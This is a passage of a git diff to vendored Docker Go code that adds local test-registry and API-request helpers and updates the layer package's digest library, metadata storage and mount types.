cmd.Env = append(cmd.Env, "GOPATH="+os.Getenv("GOPATH"), "CGO_ENABLED=0") + if out, err := cmd.CombinedOutput(); err != nil { + return "", errors.Wrapf(err, "error building basic plugin bin: %s", string(out)) + } + return installPath, nil +} diff --git 
a/vendor/github.com/docker/docker/internal/test/helper.go b/vendor/github.com/docker/docker/internal/test/helper.go new file mode 100644 index 0000000000..1b9fd75090 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/helper.go @@ -0,0 +1,6 @@ +package test + +// HelperT is a subset of testing.T that implements the Helper function +type HelperT interface { + Helper() +} diff --git a/vendor/github.com/docker/docker/internal/test/registry/ops.go b/vendor/github.com/docker/docker/internal/test/registry/ops.go new file mode 100644 index 0000000000..c004f37424 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/registry/ops.go @@ -0,0 +1,26 @@ +package registry + +// Schema1 sets the registry to serve v1 api +func Schema1(c *Config) { + c.schema1 = true +} + +// Htpasswd sets the auth method with htpasswd +func Htpasswd(c *Config) { + c.auth = "htpasswd" +} + +// Token sets the auth method to token, with the specified token url +func Token(tokenURL string) func(*Config) { + return func(c *Config) { + c.auth = "token" + c.tokenURL = tokenURL + } +} + +// URL sets the registry url +func URL(registryURL string) func(*Config) { + return func(c *Config) { + c.registryURL = registryURL + } +} diff --git a/vendor/github.com/docker/docker/internal/test/registry/registry.go b/vendor/github.com/docker/docker/internal/test/registry/registry.go new file mode 100644 index 0000000000..b6128d3ba4 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/registry/registry.go @@ -0,0 +1,255 @@ +package registry // import "github.com/docker/docker/internal/test/registry" + +import ( + "fmt" + "io/ioutil" + "net/http" + "os" + "os/exec" + "path/filepath" + "time" + + "github.com/docker/docker/internal/test" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" +) + +const ( + // V2binary is the name of the registry v2 binary + V2binary = "registry-v2" + // V2binarySchema1 is the name of the registry that serve schema1 + V2binarySchema1 = 
"registry-v2-schema1" + // DefaultURL is the default url that will be used by the registry (if not specified otherwise) + DefaultURL = "127.0.0.1:5000" +) + +type testingT interface { + assert.TestingT + logT + Fatal(...interface{}) + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +// V2 represent a registry version 2 +type V2 struct { + cmd *exec.Cmd + registryURL string + dir string + auth string + username string + password string + email string +} + +// Config contains the test registry configuration +type Config struct { + schema1 bool + auth string + tokenURL string + registryURL string +} + +// NewV2 creates a v2 registry server +func NewV2(t testingT, ops ...func(*Config)) *V2 { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + c := &Config{ + registryURL: DefaultURL, + } + for _, op := range ops { + op(c) + } + tmp, err := ioutil.TempDir("", "registry-test-") + assert.NilError(t, err) + template := `version: 0.1 +loglevel: debug +storage: + filesystem: + rootdirectory: %s +http: + addr: %s +%s` + var ( + authTemplate string + username string + password string + email string + ) + switch c.auth { + case "htpasswd": + htpasswdPath := filepath.Join(tmp, "htpasswd") + // generated with: htpasswd -Bbn testuser testpassword + userpasswd := "testuser:$2y$05$sBsSqk0OpSD1uTZkHXc4FeJ0Z70wLQdAX/82UiHuQOKbNbBrzs63m" + username = "testuser" + password = "testpassword" + email = "test@test.org" + err := ioutil.WriteFile(htpasswdPath, []byte(userpasswd), os.FileMode(0644)) + assert.NilError(t, err) + authTemplate = fmt.Sprintf(`auth: + htpasswd: + realm: basic-realm + path: %s +`, htpasswdPath) + case "token": + authTemplate = fmt.Sprintf(`auth: + token: + realm: %s + service: "registry" + issuer: "auth-registry" + rootcertbundle: "fixtures/registry/cert.pem" +`, c.tokenURL) + } + + confPath := filepath.Join(tmp, "config.yaml") + config, err := os.Create(confPath) + assert.NilError(t, err) + defer config.Close() + + 
if _, err := fmt.Fprintf(config, template, tmp, c.registryURL, authTemplate); err != nil { + // FIXME(vdemeester) use a defer/clean func + os.RemoveAll(tmp) + t.Fatal(err) + } + + binary := V2binary + if c.schema1 { + binary = V2binarySchema1 + } + cmd := exec.Command(binary, confPath) + if err := cmd.Start(); err != nil { + // FIXME(vdemeester) use a defer/clean func + os.RemoveAll(tmp) + t.Fatal(err) + } + return &V2{ + cmd: cmd, + dir: tmp, + auth: c.auth, + username: username, + password: password, + email: email, + registryURL: c.registryURL, + } +} + +// WaitReady waits for the registry to be ready to serve requests (or fail after a while) +func (r *V2) WaitReady(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + var err error + for i := 0; i != 50; i++ { + if err = r.Ping(); err == nil { + return + } + time.Sleep(100 * time.Millisecond) + } + t.Fatalf("timeout waiting for test registry to become available: %v", err) +} + +// Ping sends an http request to the current registry, and fail if it doesn't respond correctly +func (r *V2) Ping() error { + // We always ping through HTTP for our test registry. + resp, err := http.Get(fmt.Sprintf("http://%s/v2/", r.registryURL)) + if err != nil { + return err + } + resp.Body.Close() + + fail := resp.StatusCode != http.StatusOK + if r.auth != "" { + // unauthorized is a _good_ status when pinging v2/ and it needs auth + fail = fail && resp.StatusCode != http.StatusUnauthorized + } + if fail { + return fmt.Errorf("registry ping replied with an unexpected status code %d", resp.StatusCode) + } + return nil +} + +// Close kills the registry server +func (r *V2) Close() { + r.cmd.Process.Kill() + r.cmd.Process.Wait() + os.RemoveAll(r.dir) +} + +func (r *V2) getBlobFilename(blobDigest digest.Digest) string { + // Split the digest into its algorithm and hex components. 
+ dgstAlg, dgstHex := blobDigest.Algorithm(), blobDigest.Hex() + + // The path to the target blob data looks something like: + // baseDir + "docker/registry/v2/blobs/sha256/a3/a3ed...46d4/data" + return fmt.Sprintf("%s/docker/registry/v2/blobs/%s/%s/%s/data", r.dir, dgstAlg, dgstHex[:2], dgstHex) +} + +// ReadBlobContents read the file corresponding to the specified digest +func (r *V2) ReadBlobContents(t assert.TestingT, blobDigest digest.Digest) []byte { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // Load the target manifest blob. + manifestBlob, err := ioutil.ReadFile(r.getBlobFilename(blobDigest)) + assert.NilError(t, err, "unable to read blob") + return manifestBlob +} + +// WriteBlobContents write the file corresponding to the specified digest with the given content +func (r *V2) WriteBlobContents(t assert.TestingT, blobDigest digest.Digest, data []byte) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + err := ioutil.WriteFile(r.getBlobFilename(blobDigest), data, os.FileMode(0644)) + assert.NilError(t, err, "unable to write malicious data blob") +} + +// TempMoveBlobData moves the existing data file aside, so that we can replace it with a +// malicious blob of data for example. +func (r *V2) TempMoveBlobData(t testingT, blobDigest digest.Digest) (undo func()) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + tempFile, err := ioutil.TempFile("", "registry-temp-blob-") + assert.NilError(t, err, "unable to get temporary blob file") + tempFile.Close() + + blobFilename := r.getBlobFilename(blobDigest) + + // Move the existing data file aside, so that we can replace it with a + // another blob of data. 
+ if err := os.Rename(blobFilename, tempFile.Name()); err != nil { + // FIXME(vdemeester) use a defer/clean func + os.Remove(tempFile.Name()) + t.Fatalf("unable to move data blob: %s", err) + } + + return func() { + os.Rename(tempFile.Name(), blobFilename) + os.Remove(tempFile.Name()) + } +} + +// Username returns the configured user name of the server +func (r *V2) Username() string { + return r.username +} + +// Password returns the configured password of the server +func (r *V2) Password() string { + return r.password +} + +// Email returns the configured email of the server +func (r *V2) Email() string { + return r.email +} + +// Path returns the path where the registry write data +func (r *V2) Path() string { + return filepath.Join(r.dir, "docker", "registry", "v2") +} diff --git a/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go b/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go new file mode 100644 index 0000000000..d139401a62 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go @@ -0,0 +1,71 @@ +package registry // import "github.com/docker/docker/internal/test/registry" + +import ( + "net/http" + "net/http/httptest" + "regexp" + "strings" + "sync" + + "github.com/docker/docker/internal/test" +) + +type handlerFunc func(w http.ResponseWriter, r *http.Request) + +// Mock represent a registry mock +type Mock struct { + server *httptest.Server + hostport string + handlers map[string]handlerFunc + mu sync.Mutex +} + +// RegisterHandler register the specified handler for the registry mock +func (tr *Mock) RegisterHandler(path string, h handlerFunc) { + tr.mu.Lock() + defer tr.mu.Unlock() + tr.handlers[path] = h +} + +// NewMock creates a registry mock +func NewMock(t testingT) (*Mock, error) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + testReg := &Mock{handlers: make(map[string]handlerFunc)} + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, 
r *http.Request) { + url := r.URL.String() + + var matched bool + var err error + for re, function := range testReg.handlers { + matched, err = regexp.MatchString(re, url) + if err != nil { + t.Fatal("Error with handler regexp") + } + if matched { + function(w, r) + break + } + } + + if !matched { + t.Fatalf("Unable to match %s with regexp", url) + } + })) + + testReg.server = ts + testReg.hostport = strings.Replace(ts.URL, "http://", "", 1) + return testReg, nil +} + +// URL returns the url of the registry +func (tr *Mock) URL() string { + return tr.hostport +} + +// Close closes mock and releases resources +func (tr *Mock) Close() { + tr.server.Close() +} diff --git a/vendor/github.com/docker/docker/integration-cli/npipe.go b/vendor/github.com/docker/docker/internal/test/request/npipe.go similarity index 91% rename from vendor/github.com/docker/docker/integration-cli/npipe.go rename to vendor/github.com/docker/docker/internal/test/request/npipe.go index fa531a1b4d..e6ab03945e 100644 --- a/vendor/github.com/docker/docker/integration-cli/npipe.go +++ b/vendor/github.com/docker/docker/internal/test/request/npipe.go @@ -1,6 +1,6 @@ // +build !windows -package main +package request import ( "net" diff --git a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go b/vendor/github.com/docker/docker/internal/test/request/npipe_windows.go similarity index 91% rename from vendor/github.com/docker/docker/integration-cli/npipe_windows.go rename to vendor/github.com/docker/docker/internal/test/request/npipe_windows.go index 4fd735f2db..a268aac922 100644 --- a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go +++ b/vendor/github.com/docker/docker/internal/test/request/npipe_windows.go @@ -1,4 +1,4 @@ -package main +package request import ( "net" diff --git a/vendor/github.com/docker/docker/internal/test/request/ops.go b/vendor/github.com/docker/docker/internal/test/request/ops.go new file mode 100644 index 0000000000..c85308c476 --- /dev/null +++ 
b/vendor/github.com/docker/docker/internal/test/request/ops.go @@ -0,0 +1,78 @@ +package request + +import ( + "bytes" + "encoding/json" + "io" + "io/ioutil" + "net/http" + "strings" +) + +// Options defines request options, like request modifiers and which host to target +type Options struct { + host string + requestModifiers []func(*http.Request) error +} + +// Host creates a modifier that sets the specified host as the request URL host +func Host(host string) func(*Options) { + return func(o *Options) { + o.host = host + } +} + +// With adds a request modifier to the options +func With(f func(*http.Request) error) func(*Options) { + return func(o *Options) { + o.requestModifiers = append(o.requestModifiers, f) + } +} + +// Method creates a modifier that sets the specified string as the request method +func Method(method string) func(*Options) { + return With(func(req *http.Request) error { + req.Method = method + return nil + }) +} + +// RawString sets the specified string as body for the request +func RawString(content string) func(*Options) { + return RawContent(ioutil.NopCloser(strings.NewReader(content))) +} + +// RawContent sets the specified reader as body for the request +func RawContent(reader io.ReadCloser) func(*Options) { + return With(func(req *http.Request) error { + req.Body = reader + return nil + }) +} + +// ContentType sets the specified Content-Type request header +func ContentType(contentType string) func(*Options) { + return With(func(req *http.Request) error { + req.Header.Set("Content-Type", contentType) + return nil + }) +} + +// JSON sets the Content-Type request header to json +func JSON(o *Options) { + ContentType("application/json")(o) +} + +// JSONBody creates a modifier that encodes the specified data to a JSON string and set it as request body. It also sets +// the Content-Type header of the request. 
+func JSONBody(data interface{}) func(*Options) { + return With(func(req *http.Request) error { + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(data); err != nil { + return err + } + req.Body = ioutil.NopCloser(jsonData) + req.Header.Set("Content-Type", "application/json") + return nil + }) +} diff --git a/vendor/github.com/docker/docker/internal/test/request/request.go b/vendor/github.com/docker/docker/internal/test/request/request.go new file mode 100644 index 0000000000..1986d370f1 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/request/request.go @@ -0,0 +1,218 @@ +package request // import "github.com/docker/docker/internal/test/request" + +import ( + "context" + "crypto/tls" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/url" + "os" + "path/filepath" + "time" + + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +// NewAPIClient returns a docker API client configured from environment variables +func NewAPIClient(t assert.TestingT, ops ...func(*client.Client) error) client.APIClient { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ops = append([]func(*client.Client) error{client.FromEnv}, ops...) + clt, err := client.NewClientWithOpts(ops...) 
+ assert.NilError(t, err) + return clt +} + +// DaemonTime provides the current time on the daemon host +func DaemonTime(ctx context.Context, t assert.TestingT, client client.APIClient, testEnv *environment.Execution) time.Time { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if testEnv.IsLocalDaemon() { + return time.Now() + } + + info, err := client.Info(ctx) + assert.NilError(t, err) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + assert.NilError(t, err, "invalid time format in GET /info response") + return dt +} + +// DaemonUnixTime returns the current time on the daemon host with nanoseconds precision. +// It return the time formatted how the client sends timestamps to the server. +func DaemonUnixTime(ctx context.Context, t assert.TestingT, client client.APIClient, testEnv *environment.Execution) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + dt := DaemonTime(ctx, t, client, testEnv) + return fmt.Sprintf("%d.%09d", dt.Unix(), int64(dt.Nanosecond())) +} + +// Post creates and execute a POST request on the specified host and endpoint, with the specified request modifiers +func Post(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + return Do(endpoint, append(modifiers, Method(http.MethodPost))...) +} + +// Delete creates and execute a DELETE request on the specified host and endpoint, with the specified request modifiers +func Delete(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + return Do(endpoint, append(modifiers, Method(http.MethodDelete))...) +} + +// Get creates and execute a GET request on the specified host and endpoint, with the specified request modifiers +func Get(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + return Do(endpoint, modifiers...) 
+} + +// Do creates and execute a request on the specified endpoint, with the specified request modifiers +func Do(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) { + opts := &Options{ + host: DaemonHost(), + } + for _, mod := range modifiers { + mod(opts) + } + req, err := newRequest(endpoint, opts) + if err != nil { + return nil, nil, err + } + client, err := newHTTPClient(opts.host) + if err != nil { + return nil, nil, err + } + resp, err := client.Do(req) + var body io.ReadCloser + if resp != nil { + body = ioutils.NewReadCloserWrapper(resp.Body, func() error { + defer resp.Body.Close() + return nil + }) + } + return resp, body, err +} + +// ReadBody read the specified ReadCloser content and returns it +func ReadBody(b io.ReadCloser) ([]byte, error) { + defer b.Close() + return ioutil.ReadAll(b) +} + +// newRequest creates a new http Request to the specified host and endpoint, with the specified request modifiers +func newRequest(endpoint string, opts *Options) (*http.Request, error) { + hostURL, err := client.ParseHostURL(opts.host) + if err != nil { + return nil, errors.Wrapf(err, "failed parsing url %q", opts.host) + } + req, err := http.NewRequest("GET", endpoint, nil) + if err != nil { + return nil, errors.Wrap(err, "failed to create request") + } + + if os.Getenv("DOCKER_TLS_VERIFY") != "" { + req.URL.Scheme = "https" + } else { + req.URL.Scheme = "http" + } + req.URL.Host = hostURL.Host + + for _, config := range opts.requestModifiers { + if err := config(req); err != nil { + return nil, err + } + } + + return req, nil +} + +// newHTTPClient creates an http client for the specific host +// TODO: Share more code with client.defaultHTTPClient +func newHTTPClient(host string) (*http.Client, error) { + // FIXME(vdemeester) 10*time.Second timeout of SockRequest… ? 
+ hostURL, err := client.ParseHostURL(host) + if err != nil { + return nil, err + } + transport := new(http.Transport) + if hostURL.Scheme == "tcp" && os.Getenv("DOCKER_TLS_VERIFY") != "" { + // Setup the socket TLS configuration. + tlsConfig, err := getTLSConfig() + if err != nil { + return nil, err + } + transport = &http.Transport{TLSClientConfig: tlsConfig} + } + transport.DisableKeepAlives = true + err = sockets.ConfigureTransport(transport, hostURL.Scheme, hostURL.Host) + return &http.Client{Transport: transport}, err +} + +func getTLSConfig() (*tls.Config, error) { + dockerCertPath := os.Getenv("DOCKER_CERT_PATH") + + if dockerCertPath == "" { + return nil, errors.New("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable") + } + + option := &tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, "ca.pem"), + CertFile: filepath.Join(dockerCertPath, "cert.pem"), + KeyFile: filepath.Join(dockerCertPath, "key.pem"), + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + + return tlsConfig, nil +} + +// DaemonHost return the daemon host string for this test execution +func DaemonHost() string { + daemonURLStr := "unix://" + opts.DefaultUnixSocket + if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" { + daemonURLStr = daemonHostVar + } + return daemonURLStr +} + +// SockConn opens a connection on the specified socket +func SockConn(timeout time.Duration, daemon string) (net.Conn, error) { + daemonURL, err := url.Parse(daemon) + if err != nil { + return nil, errors.Wrapf(err, "could not parse url %q", daemon) + } + + var c net.Conn + switch daemonURL.Scheme { + case "npipe": + return npipeDial(daemonURL.Path, timeout) + case "unix": + return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout) + case "tcp": + if os.Getenv("DOCKER_TLS_VERIFY") != "" { + // Setup the socket TLS configuration. 
+ tlsConfig, err := getTLSConfig() + if err != nil { + return nil, err + } + dialer := &net.Dialer{Timeout: timeout} + return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig) + } + return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout) + default: + return c, errors.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon) + } +} diff --git a/vendor/github.com/docker/docker/internal/testutil/helpers.go b/vendor/github.com/docker/docker/internal/testutil/helpers.go new file mode 100644 index 0000000000..38cd1693f5 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/testutil/helpers.go @@ -0,0 +1,17 @@ +package testutil // import "github.com/docker/docker/internal/testutil" + +import ( + "io" +) + +// DevZero acts like /dev/zero but in an OS-independent fashion. +var DevZero io.Reader = devZero{} + +type devZero struct{} + +func (d devZero) Read(p []byte) (n int, err error) { + for i := range p { + p[i] = 0 + } + return len(p), nil +} diff --git a/vendor/github.com/docker/docker/internal/testutil/stringutils.go b/vendor/github.com/docker/docker/internal/testutil/stringutils.go new file mode 100644 index 0000000000..574aeb51f2 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/testutil/stringutils.go @@ -0,0 +1,14 @@ +package testutil // import "github.com/docker/docker/internal/testutil" + +import "math/rand" + +// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n. 
+func GenerateRandomAlphaOnlyString(n int) string { + // make a really long string + letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") + b := make([]byte, n) + for i := range b { + b[i] = letters[rand.Intn(len(letters))] + } + return string(b) +} diff --git a/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go b/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go new file mode 100644 index 0000000000..753aac966d --- /dev/null +++ b/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go @@ -0,0 +1,34 @@ +package testutil // import "github.com/docker/docker/internal/testutil" + +import ( + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func testLengthHelper(generator func(int) string, t *testing.T) { + expectedLength := 20 + s := generator(expectedLength) + assert.Check(t, is.Equal(expectedLength, len(s))) +} + +func testUniquenessHelper(generator func(int) string, t *testing.T) { + repeats := 25 + set := make(map[string]struct{}, repeats) + for i := 0; i < repeats; i = i + 1 { + str := generator(64) + assert.Check(t, is.Equal(64, len(str))) + _, ok := set[str] + assert.Check(t, !ok, "Random number is repeated") + set[str] = struct{}{} + } +} + +func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) { + testLengthHelper(GenerateRandomAlphaOnlyString, t) +} + +func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) { + testUniquenessHelper(GenerateRandomAlphaOnlyString, t) +} diff --git a/vendor/github.com/docker/docker/layer/empty.go b/vendor/github.com/docker/docker/layer/empty.go index 3b6ffc82f7..c81c702140 100644 --- a/vendor/github.com/docker/docker/layer/empty.go +++ b/vendor/github.com/docker/docker/layer/empty.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "archive/tar" @@ -54,3 +54,8 @@ func (el *emptyLayer) DiffSize() (size int64, err error) { func (el *emptyLayer) Metadata() 
(map[string]string, error) { return make(map[string]string), nil } + +// IsEmpty returns true if the layer is an EmptyLayer +func IsEmpty(diffID DiffID) bool { + return diffID == DigestSHA256EmptyTar +} diff --git a/vendor/github.com/docker/docker/layer/empty_test.go b/vendor/github.com/docker/docker/layer/empty_test.go index c22da7665d..ec9fbc1a3c 100644 --- a/vendor/github.com/docker/docker/layer/empty_test.go +++ b/vendor/github.com/docker/docker/layer/empty_test.go @@ -1,15 +1,15 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io" "testing" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" ) func TestEmptyLayer(t *testing.T) { if EmptyLayer.ChainID() != ChainID(DigestSHA256EmptyTar) { - t.Fatal("wrong ID for empty layer") + t.Fatal("wrong ChainID for empty layer") } if EmptyLayer.DiffID() != DigestSHA256EmptyTar { @@ -28,12 +28,18 @@ func TestEmptyLayer(t *testing.T) { t.Fatal("expected zero diffsize for empty layer") } + meta, err := EmptyLayer.Metadata() + + if len(meta) != 0 || err != nil { + t.Fatal("expected zero length metadata for empty layer") + } + tarStream, err := EmptyLayer.TarStream() if err != nil { t.Fatalf("error streaming tar for empty layer: %v", err) } - digester := digest.Canonical.New() + digester := digest.Canonical.Digester() _, err = io.Copy(digester.Hash(), tarStream) if err != nil { diff --git a/vendor/github.com/docker/docker/layer/filestore.go b/vendor/github.com/docker/docker/layer/filestore.go index 42b45556e3..208a0c3a85 100644 --- a/vendor/github.com/docker/docker/layer/filestore.go +++ b/vendor/github.com/docker/docker/layer/filestore.go @@ -1,9 +1,8 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "compress/gzip" "encoding/json" - "errors" "fmt" "io" "io/ioutil" @@ -13,10 +12,11 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" 
"github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( @@ -37,10 +37,10 @@ type fileMetadataTransaction struct { ws *ioutils.AtomicWriteSet } -// NewFSMetadataStore returns an instance of a metadata store +// newFSMetadataStore returns an instance of a metadata store // which is backed by files on disk using the provided root // as the root of metadata files. -func NewFSMetadataStore(root string) (MetadataStore, error) { +func newFSMetadataStore(root string) (*fileMetadataStore, error) { if err := os.MkdirAll(root, 0700); err != nil { return nil, err } @@ -66,7 +66,7 @@ func (fms *fileMetadataStore) getMountFilename(mount, filename string) string { return filepath.Join(fms.getMountDirectory(mount), filename) } -func (fms *fileMetadataStore) StartTransaction() (MetadataTransaction, error) { +func (fms *fileMetadataStore) StartTransaction() (*fileMetadataTransaction, error) { tmpDir := filepath.Join(fms.root, "tmp") if err := os.MkdirAll(tmpDir, 0755); err != nil { return nil, err @@ -165,7 +165,7 @@ func (fms *fileMetadataStore) GetParent(layer ChainID) (ChainID, error) { return "", err } - dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + dgst, err := digest.Parse(strings.TrimSpace(string(content))) if err != nil { return "", err } @@ -179,7 +179,7 @@ func (fms *fileMetadataStore) GetDiffID(layer ChainID) (DiffID, error) { return "", err } - dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + dgst, err := digest.Parse(strings.TrimSpace(string(content))) if err != nil { return "", err } @@ -194,8 +194,8 @@ func (fms *fileMetadataStore) GetCacheID(layer ChainID) (string, error) { } content := strings.TrimSpace(string(contentBytes)) - if !stringIDRegexp.MatchString(content) { - return "", errors.New("invalid cache id value") + if content == "" { + return "", errors.Errorf("invalid cache id value") } return content, nil @@ -226,6 +226,7 @@ func 
(fms *fileMetadataStore) TarSplitReader(layer ChainID) (io.ReadCloser, erro } f, err := gzip.NewReader(fz) if err != nil { + fz.Close() return nil, err } @@ -296,7 +297,7 @@ func (fms *fileMetadataStore) GetMountParent(mount string) (ChainID, error) { return "", err } - dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + dgst, err := digest.Parse(strings.TrimSpace(string(content))) if err != nil { return "", err } diff --git a/vendor/github.com/docker/docker/layer/filestore_test.go b/vendor/github.com/docker/docker/layer/filestore_test.go index 55e3b28530..498379e37f 100644 --- a/vendor/github.com/docker/docker/layer/filestore_test.go +++ b/vendor/github.com/docker/docker/layer/filestore_test.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "fmt" @@ -10,7 +10,7 @@ import ( "syscall" "testing" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" ) func randomLayerID(seed int64) ChainID { @@ -24,12 +24,12 @@ func newFileMetadataStore(t *testing.T) (*fileMetadataStore, string, func()) { if err != nil { t.Fatal(err) } - fms, err := NewFSMetadataStore(td) + fms, err := newFSMetadataStore(td) if err != nil { t.Fatal(err) } - return fms.(*fileMetadataStore), td, func() { + return fms, td, func() { if err := os.RemoveAll(td); err != nil { t.Logf("Failed to cleanup %q: %s", td, err) } diff --git a/vendor/github.com/docker/docker/layer/filestore_unix.go b/vendor/github.com/docker/docker/layer/filestore_unix.go new file mode 100644 index 0000000000..68e7f90779 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore_unix.go @@ -0,0 +1,15 @@ +// +build !windows + +package layer // import "github.com/docker/docker/layer" + +import "runtime" + +// setOS writes the "os" file to the layer filestore +func (fm *fileMetadataTransaction) setOS(os string) error { + return nil +} + +// getOS reads the "os" file from the layer filestore +func (fms *fileMetadataStore) getOS(layer 
ChainID) (string, error) { + return runtime.GOOS, nil +} diff --git a/vendor/github.com/docker/docker/layer/filestore_windows.go b/vendor/github.com/docker/docker/layer/filestore_windows.go new file mode 100644 index 0000000000..cecad426c8 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore_windows.go @@ -0,0 +1,35 @@ +package layer // import "github.com/docker/docker/layer" + +import ( + "fmt" + "io/ioutil" + "os" + "strings" +) + +// setOS writes the "os" file to the layer filestore +func (fm *fileMetadataTransaction) setOS(os string) error { + if os == "" { + return nil + } + return fm.ws.WriteFile("os", []byte(os), 0644) +} + +// getOS reads the "os" file from the layer filestore +func (fms *fileMetadataStore) getOS(layer ChainID) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getLayerFilename(layer, "os")) + if err != nil { + // For backwards compatibility, the os file may not exist. Default to "windows" if missing. + if os.IsNotExist(err) { + return "windows", nil + } + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if content != "windows" && content != "linux" { + return "", fmt.Errorf("invalid operating system value: %s", content) + } + + return content, nil +} diff --git a/vendor/github.com/docker/docker/layer/layer.go b/vendor/github.com/docker/docker/layer/layer.go index ec1d4346d7..d0c7fa8608 100644 --- a/vendor/github.com/docker/docker/layer/layer.go +++ b/vendor/github.com/docker/docker/layer/layer.go @@ -7,16 +7,17 @@ // read-only and writable layers. The exported // tar data for a read-only layer should match // the tar used to create the layer. 
-package layer +package layer // import "github.com/docker/docker/layer" import ( "errors" "io" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) var ( @@ -52,8 +53,8 @@ var ( ErrMaxDepthExceeded = errors.New("max depth exceeded") // ErrNotSupported is used when the action is not supported - // on the current platform - ErrNotSupported = errors.New("not support on this platform") + // on the current host operating system. + ErrNotSupported = errors.New("not support on this host operating system") ) // ChainID is the content-addressable ID of a layer. @@ -126,7 +127,7 @@ type RWLayer interface { // Mount mounts the RWLayer and returns the filesystem path // the to the writable layer. - Mount(mountLabel string) (string, error) + Mount(mountLabel string) (containerfs.ContainerFS, error) // Unmount unmounts the RWLayer. This should be called // for every mount. If there are multiple mount calls @@ -167,7 +168,14 @@ type Metadata struct { // writable mount. Changes made here will // not be included in the Tar stream of the // RWLayer. -type MountInit func(root string) error +type MountInit func(root containerfs.ContainerFS) error + +// CreateRWLayerOpts contains optional arguments to be passed to CreateRWLayer +type CreateRWLayerOpts struct { + MountLabel string + InitFunc MountInit + StorageOpt map[string]string +} // Store represents a backend for managing both // read-only and read-write layers. 
